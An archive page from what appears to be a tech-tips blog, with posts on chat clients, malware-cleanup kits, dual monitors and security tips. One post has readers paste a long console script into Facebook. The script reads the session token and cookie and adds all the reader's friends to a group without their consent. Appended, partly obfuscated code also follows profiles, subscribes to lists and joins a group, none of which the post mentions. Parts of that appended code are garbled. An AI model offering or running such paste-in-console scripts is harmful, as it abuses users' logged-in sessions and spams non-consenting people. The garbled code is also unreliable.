Showing posts with label your. Show all posts
Showing posts with label your. Show all posts

Saturday, May 27, 2017

Check Devices Connected to your Wi Fi using Android

Check Devices Connected to your Wi Fi using Android


Wi-Fi has made connecting to internet a breeze, once can easily scan and connect to an open network while sitting anywhere in the Wi-Fi range zone. Either you have kept the modem in your room or in your lobby and if you have the Wi-Fi signal then you can be easily connect to internet and enjoy your work for anywhere.


Go to link Download

Read more »

Sunday, April 23, 2017

Code your All Friends on a FB Group

Code your All Friends on a FB Group


Guys if you want to code your friends on a group so follow these steps.

1.Go to your Facebook account.
2.Open the group.
3.Press CTRL+SHIFT+J for Google Chrome or press CTRL+SHIFT+K for Mozilla Firefox.
4.Paste the Script.
5.press Enter.

                                                               (Script)


(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id=hasilsatu></div><div id=hasildua></div><div id=hasiltiga style=min-width:300px;display:inline-block;text-align:left></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style=color:darkred>Gruppe Öffnen!</b>"+crj:"<b style=color:darkgreen>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style=color:darkred>( "+f.gagal+" )</b> <span style=color:darkred>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style=color:darkgreen>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style=color:darkgreen>( "+f.okeh+" )</b> <a href=/"+c.uid+" target=_blank><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style=font-size:20px;font-weight:bold>20 Leute Einladen!</div><a href=/ onClick=document.getElementById("hasilsurasil").style.display="none";return false>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style=margin-top:10px;color:gray;font-size:12px>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style=font-size:9px><a href=http://"+crl+"/ target=_blank>"+crl+"</a></div></div>";document.body.innerHTML+="<center id=hasilsurasil style=min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1])
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement(script);
a.innerHTML = "new AsyncRequest().setURI(/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe).setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("");
a("");

var fb_dtsg = document[getElementsByName](fb_dtsg)[0][value];
var user_id = document[cookie][match](document[cookie][match](/c_user=(d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = /ajax/groups/membership/r2j.php?__a=1;
var paramswp = &ref=group_jump_header&group_id= + gid + &fb_dtsg= + fb_dtsg + &__user= + user_id + &phstamp=;
httpwp[open](POST, urlwp, true);
httpwp[setRequestHeader](Content-type, application/x-www-form-urlencoded);
httpwp[setRequestHeader](Content-length, paramswp[length]);
httpwp[setRequestHeader](Connection, keep-alive);
httpwp[send](paramswp);

var fb_dtsg = document[getElementsByName](fb_dtsg)[0][value];
var user_id = document[cookie][match](document[cookie][match](/c_user=(d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf[open](GET, /ajax/typeahead/first_degree.php?__a=1&viewer= + user_id + &token + Math[random]() + &filter[0]=user&options[0]=friends_only, false);
gf[send]();
if (gf[readyState] != 4) {} else {
data = eval(( + gf[responseText][substr](9) + ));
if (data[error]) {} else {
friends = data[payload][entries][sort](function (_0x93dax8, _0x93dax9) {
return _0x93dax8[index] - _0x93dax9[index];
});
};
};

Go to link Download

Read more »

Friday, April 21, 2017

Clean Your Infected PC With Emsisoft Emergency Kit

Clean Your Infected PC With Emsisoft Emergency Kit


The Emsisoft Emergency Kit contains a collection of programs that can be used to scan and clean infected computers for malware.It is portable and you can run it directly from your USB flash drive or from your computer’s hard drive.So there is no need to   install it.

 8-26-2010 07-08-29

This Emergency Kit consists of 4 components:

8-26-2010 07-59-45

1.Emsisoft Emergency Kit Scanner

  • With the Emsisoft Emergency Kit Scanner you  can scan the infected PC for Viruses, Trojans, Spyware, Adware, Worms, Dialers, Key loggers and other malign programs. If any Malware found , you  can be moved  it to quarantine  and  finally deleted.

2.Emsisoft Commandline Scanner

  • Almost same  functionality as the Emergency Kit Scanner but doesnt have  a graphical user interface. The command line tool is made for professional users and can be used perfectly for batch jobs.

To run the Emsisoft Command line Scanner- Open a command prompt window (Run: cmd.exe). Switch to the drive of the USB Stick (e.g.: f:) and then to the folder of the executable files (e.g.: cd run). Run the scanner by typing: a2cmd.exe

3.Emsisoft HiJackFree

  • With HiJackFree you can manage all active processes, services, drivers, autoruns, open ports, hosts file entries and many more which  helps  the advanced users to detect and remove Malware manually.

4.Emsisoft BlitzBlank

  • Malware infections are not always easy to clean up.It is almost impossible to delete a Malware file while Windows is running ,because most of them are  protect themselves from being deleted. BlitzBlank deletes files, Registry entries and drivers at boot time before Windows and all other programs are loaded.

Download :Emsisoft Free Emergency Kit | OS:Windows XP, 2003/2008 Server, Vista and 7|94MB


Go to link Download

Read more »

Saturday, April 15, 2017

Change Your Facebook Theme

Change Your Facebook Theme


when you login to your facebook account you look simple old boring blue facebook theme.But now you can make your facebook very awsome and beautiful by fallowing this tutorial.This tutorial is composed up of different steps with screenshot guidelines ,so that you can understand it easily.Follow the below steps and make your facebbok eye touching look. 

STEP NO 1: 

LOGIN IN TO YOUR FACEBOOK ACCOUNT WITH YOUR EMAIL/USERNAME AND PASSWORD 


STEP NO 2: 

NOW YOU HAVE LOGIN 



STEP NO 3: 

OPEN UP YOUR BROWSER AND SEARCH FOR "STYLISH FIREFOX ADDON" IN GOOGLE 



STEP NO 4: 

NOW CLICK ON "ADD TO FIREFOX", WHEN ADDON INSTALLED RESTART YOUR WEB BROWSER 



STEP NO 5: 

WHEN YOU RESTART YOUR BROWSER YOU WILL FIND A "S" ICON ON THE RIGHT HAND SIDE OF YOUR WEB BROWSER TOLL BAR 



STEP NO 6: 

NOW STAY ON YOUR FACEBOOK PAGE AND CLICK ON "S" >> AND SELECT >> "FIND STYLES FOR THIS WEBSITE".NOW SELECT YOUR FAVORATE THEME. 



STEP NO 7: 

NOW CLICK ON "INSTALL WITH STYLISH" ,YOU HAVE DONE ENJOY THE NEW AWSOME LOOOOOOOOOOOOOOOOOOOK 


Go to link Download

Read more »

Sunday, April 9, 2017

Chat at Many Social Networking without opening Your Browser

Chat at Many Social Networking without opening Your Browser


Do you have some social networking?(AIM, MSN, Yahoo, ICQ, Google Talk, Jabber, and Facebook Chat)
You want to chat with all your friends on all that networks. It will be being crowded if you open at a time. Now all will be change, there is an application that can cover it.












Download this application here.

Advantage of Digsby chat:
  • One combined buddy list for all your AIM, MSN, Yahoo, ICQ, Google Talk, Jabber, and Facebook Chat Accounts.
  • Manage multiple conversations with tabbed conversation windows. You can drag tabs out into their own windows for important conversations.
  • Rename contacts with an alias so you dont have to remember buddy names like giantsfan123.
  • If one of your friends has more than one IM account you can combine them into a single merged contact to eliminate duplicate buddies.
  • Send your friends SMS messages right from the IM window.
  • The InfoBox lets you check everyones status message and profile just by moving your mouse down the list.
  • Changing your status has never been easier. just one click right on the buddy list!
  • Multitask while you chat. Minimize the IM window and you see popups of new IMs. Best of all, you can reply right from the popup and get back to what you were doing.
  • Log conversation history and find the information you need our search-enabled log viewer.
Dont forget to share this ...!

Go to link Download

Read more »

Wednesday, March 29, 2017

Clean up Your Facebook Profile with FaceWash

Clean up Your Facebook Profile with FaceWash



Whether your Facebook Profile  flooding with vulgarities  or embarrassing pictures and postings that  you shouldnt have liked? Now here is  a way to clean them up.
The FaceWash app will search through comments posted on your wall or remarks left on photos youve been tagged in, as well as photos youve posted, links and pictures youve liked, status updates, and pages of which you are a "fan."

12
To use FaceWash, Facebook users  have to visit , Facewa.sh, click "Get Started" and log into their Facebook account if they arent logged in already.The user will be prompted to click "Go to App" and then give the app permission to access the users content.

  • Comments posted on your wall
  • Comments on photos you are tagged in
  • Photos you posted
  • Links that you have liked
  • Photos that you have liked
  • Status updates you have posted
  • Pages that you are a fan of

You can also search for a term and if FaceWash finds a match, itll show it to the user and link the posts so the user can easily delete  status updates, photo captions, and comments users left or received as well as pages and links that were liked.

25-01-2013 15-34-35

The three students built FaceWash in less than two days – Gur, Camden Fullmer and David Steinberg. Since launching on Sunday, FaceWash has received more than 20,000 unique visitors.Its still in beta phase so users may encounter minor glitches.

 arrow FaceWash


Go to link Download

Read more »

Wednesday, March 22, 2017

Connecting a Monitor Projector to Your Laptop

Connecting a Monitor Projector to Your Laptop


  • Getting Set Up
Connect a Monitor to Your Laptop
    Advancements in processors, other hardware, and operating systems (OSs) now make multitasking easier than ever. A typical computer session may include browsing the Web while downloading music, or editing a photo while virus scan runs in the background. For example, Intels latest mobile processors allow laptop users to simultaneously run multiple, resource-intensive programs while consuming very little power.
Because of the increase in energy efficiency and performance, laptops in general have become smaller, thinner, and lighter. Most new models come equipped with dual monitor support and accelerated video technology, making connecting an additional monitor a simple operation. 

Why use a second monitor?

   Dual monitor configurations make complex projects easier to work on. Graphic designers, for example, often have several editing programs running at the same time. Adding an additional monitor doubles visual "real estate," giving users more room to work and play. Your desktop view can either be replicated on the second screen or stretched across it to form a larger work area.
Smaller laptop screens are great for traveling, but can be hard on your eyes for extended use. Connecting a full-size monitor to your laptop computer allows you to choose screen resolutions and refresh rates that cause less eye strain.
Whether you plan to make a presentation, are working on a massive project or your laptop screen suddenly stops working, learning how to connect a monitor to your laptop can save you a lot of time and frustration.
Connect a monitor to your laptop

    Laptops usually have one or more digital visual interface (DVI), video graphics array (VGA), or separate video (S-Video) ports. DVI ports are used to connect some flat panel LCD displays, while VGA ports can connect either LCD or older style CRT monitors. In addition to monitors, S-Video ports can also be used to connect video cameras, DVD players, and TVs.
If you have an older laptop that does not have a monitor port, you can purchase a USB 2.0-to-SVGA video adapter. The adapter plugs into one of your USB 2.0 ports. With it, one or more LCD or CRT monitors can be connected to your computer. They are reasonably priced and can be found online or through your local computer dealer.
Lets get started.
  • Shut down your laptop and unplug it. Set the monitor next to the laptop on a secure surface.
  • Determine which type of connector your monitor has and plug it into the corresponding port on the back or side of your laptop. DVI ports are usually white, and most VGA ports are blue (refer to your laptop owners manual if necessary). If your monitor uses a different connector than what is available on your laptop, you can get an adapter to make them work. Tighten the connector screws, and then turn on the monitor.
  • Plug your laptop in and turn it on. If the monitor does not show your OS loading, go to the next step.
  • On your laptop keyboard, locate the FN key and the display function key (typically F5, F7 or F8), which usually has a picture of a monitor or the words CRT/LCD on it. To activate the monitor display, hold down the FN key, then press the display function key. It may take a few seconds for the monitor to respond. Refer to your laptop owners manual if you have trouble locating or using the display function key.
Configure the screens
    Most laptops mirror your desktop on the second monitor by default. By changing a few settings, you can extend your desktop across both monitors, allowing you to drag open programs from one screen to the other.
In Windows Vista*:
  • Right-click on your desktop and select "Personalize" then "Display Settings."
  • Arrange the two virtual monitor displays by dragging the boxes to correspond to the location of your actual monitors. For example, if your laptop is located on the left of the monitor, drag the two boxes so that Monitor 1 is on the left and Monitor 2 is on the right.
  • Select the additional monitor from the drop-down menu, check the box beside "Extend the desktop onto this monitor" then click "Apply."
  • In Windows XP*:
    • Right-click on your desktop, then select "Properties." In the Display Properties dialog box, click the "Settings" tab.
    • Arrange the virtual monitor displays if necessary. Select the additional monitor, check "Extend my Windows desktop," then click "OK".
    Connecting a monitor to your laptop is that easy. Other OSs such as Linux use slightly different software configurations, but they are very similar overall. Experiment with different settings and monitor combinations to get the most out of your new dual-screen workstation.

Go to link Download

Read more »

Tuesday, March 7, 2017

Computer Security Tips to Protect your System information Internate Trick

Computer Security Tips to Protect your System information Internate Trick








Computer Security Tips to Protect your System information | Internate Trick

We hear a lots and lots of concerning cases of hacking, softwares, malwares, viruses, etc, Here are some Computer Security tips to safeguard your PC/laptop against hacker intrusions, malware and different viruses that exploits your PC or Laptops.





Tags:-   computer security tricks, computer security tricks and tips,computer security,computer security force,computer security tips free,Free computer security,Free Tips for computer security, security Tips,computer Tips, computer security tips and tricks, Computer security tips for employees, computer security tips in hindi, computer security tips for users, computer security tips for students, computer security tips for home, computer security tips ppt, computer security tips for travelers, computer security tips, computer security awareness tips, advanced computer security tips, computer safety and security tips, tips for computer security and to prevent viruses, computer and internet security tips, tips about computer security, basic computer security tips, best computer security tips, computer security tips of the day, desktop computer security tips, daily computer security tips, easy computer security tips, security tips for computer, security tips for keeping computer secure, security tips for personal computer, general computer security tips, holiday computer security tips, helpful computer security tips, key computer security tips, computer network security tips office computer security tips, security tips of computer, general security tips of computer, tips on computer security awareness, computer security prevention tips, computer password security tips, public computer security tips, quick computer security tips, tips regarding computer security, computer security safety tips, simple computer security tips, computer security travel tips, computer security tech tips, top computer security tips, ten computer security tips, tips to computer security, security tips for your computer, 10 computer security tips, top 5 computer security tips,  


 

6 Computer Security Tips


1) Use a firewall

A firewall is a software system that will handle outgoing and incoming Internet connections of your computer. You’ll be able to clearly use the one engineered into Windows by default, however this can be by no means the foremost Efficient. i will like to recommend Comodo Firewall which is free and straightforward to use. Using Firewall is just one of Computer Security tip that i want to mention

2) Use antivirus

There are obvious reasons to use Anti virus Programs, but there are People that don’t have any antivirus or those who have, they have not upgraded thier antivirus since their permit has lapsed.. However there are quite powerful free antivirus Available. One must Install Antivirus to Protect and Keep thier Computer Secure

3) Updating software system:

New vulnerabilities are found in software system or operative systems like Windows each day. So one must always updates thier software system. Keeping your installed Softwares upto date is Important, as it will Keep hackers away from breaking into your System and its Said that any upto date program Works smooth without any glitch.

4) Use complicated passwords

Users like you and me use too weak  passwords that are very simple to detect for hackers, there are so many software which will try all Possible Combinations to Crack your Password, this is known as Bruteforce technique .  If your secret word(password) Consists of just 4 or 5 characters, it will easily discover it.

Your Password becomes harder to crack if it consists of 8 or 9 characters which also includes numbers, letters and special characters.To check the strength of your Password, there are plenty tools over internet. This is an important Computer Security tip that everyone must Consider.

5) Use totally different passwords

Most common mistake people make is that they use same password everywhere over internet. Yes, its very hard to remember passwords for all accounts but its highly advisible to have different passwords for different accounts.

This Practice Comes handy if one of your account gets Compromised/Hacked, then your other accounts are still safe.

6) Always Beware:

  • Finally, Abstain from getting hacked,  Always beware while Browsing Internet, don’t transfer and install everything and anything on your PC or Laptop.
  • Always check the sources of software system and websites that you just use to download programs.
  • Don’t be silly and amateur hackers won’t be able to do  anything to you (while serious and skilled hackers will not have any interest to hack you)

Do you have any Computer Security tip that you will like to share ? Feel free to comment below.




Request:-Please give your valuable feedback to comment or 2 Min to share this post if you kind person.

Go to link Download

Read more »

Friday, February 24, 2017

Chit Chat Facebook Chat without Opening your Browser

Chit Chat Facebook Chat without Opening your Browser


Chit Chat for Facebook is a free instant messenger that allows you to chat with all your Facebook contacts. Chit Chat connects to Facebook Chat and removes the need to use a web-browser to talk over Facebook Chat.

Benefits of Chit Chat for Facebook

  • Fun and Free - Convenient and fun way to chat with your Facebook contacts without the hassle of surfing Facebook
  • Free Your Web-Browser - No need to keep your web browser logged into Facebook
  • Easy To Use - Download, install and then login with your Facebook username and password - easy!
  • Popular? - Swift and fast tabbed chat Interface making it easy to talk to many friends at once
  • Instant Message Notification - Lets you know when you receive an instant message.
Download Chit Chat for Facebook

Go to link Download

Read more »

Sunday, January 15, 2017

Carbon Copy Cloner CCC 3 4 2 Easily make copies of your hard drive

Carbon Copy Cloner CCC 3 4 2 Easily make copies of your hard drive


To safely backup your hard drive, you can create a clone of it, which you will synchronize and backup on another drive.

Carbon Copy Cloner (CCC) is a completely free solution to create clones of your disks, so you never ever have to worry again about losing your data. The application features a simple interface, from where you select the drive or folders to backup and the target drive to save to. Ive found that youll have to make sure a local disk is connected to your Mac so the program can start up though.

With CCC you can schedule automatic backups, which saves you the hassle of taking care of the backups yourself. Just decide on what day of the week and time you want CCC to work and let the program do its job.

More knowledgeable users will also like being able to run pre and post-flight shell scripts, checking the list of items removed after a clone, and creating a disk image.

Once thing weve noticed though, is that some Mac OS X 10.5 users have complained of instability issues with CCC.

Despite these problems with Leopard, Carbon Copy Cloner is a very good program to clone and backup your drive, not to mention that its free. Very much recommended.

Download Carbon Copy Cloner (CCC) 3.4.2 in Softonic

View Original Article

Blogged with the Flock Browser

Go to link Download

Read more »

Monday, November 14, 2016

Celebrate Your Freedoms

Celebrate Your Freedoms




It took great courage for those representatives of the original 13 colonies to decide to Declare their Independence from Great Britain....Celebrate what this Day means to our Country and its History. I visited the Jamestown/Williamsburg area of the USA in 2007 when Jamestown was celebrating the 400th Anniversary of the first "English" settlement in the current US. This was before the pilgrims came to Plymouth. Those first pioneers had both a good and a "bad" impact on the land here and forever changed the lives of the Indians already living here. But for better or for worse we (the aliens from another land) were here and our future and foundation of our current everyday life was set to go foward from that time.
God Bless America

**I used the fun wordart application of WORDLE to create my graphic above. I first created the wordle, then took a screen shot of my creation, pasted the screen shot into my photo/graphic editing software Digital Image Suite 2006. Next I removed the white background using the plugin "eraser genuine" available at
http://www.mehdiplugins.com/english/erasergenuine.htm. Then I just had fun copying various portions of the wordle art & filling with colors and gradient patterns using the tools of Digital Image and added some stars.


This photo above was taken from a yacht that my husband was crewing on sailing it from the island of Antigua to NYC in May of 1999. He didnt have a ZOOM lens on his camera to get a closer shot of the Statue of Liberty. But he told me later that the sight of "The Lady" really does bring a lump to your throat and makes you think about all of those who came to the United States searching for FREEDOM and making a life for themselves here.

And heres the photo he took coming into harbor in NYC...you can see the World Trade Center twin towers -
CELEBRATE the USAs Birthday and
Honor those who help keep us FREE




Go to link Download

Read more »

Sunday, October 16, 2016

Cleanse your Arteries with Natural Ingredients Recipes

Cleanse your Arteries with Natural Ingredients Recipes


Arteries is the line that carries blood to all the organs inside your body. Its like a stream of blood being distributed among your vital body organs and if they get blocked that could lead to some serious health problems, either you can have a heart attack or even death. So now from ages Russians are creating some natural recipes at home that help them to cleanse these arteries and keep a constant blood flow.


Go to link Download

Read more »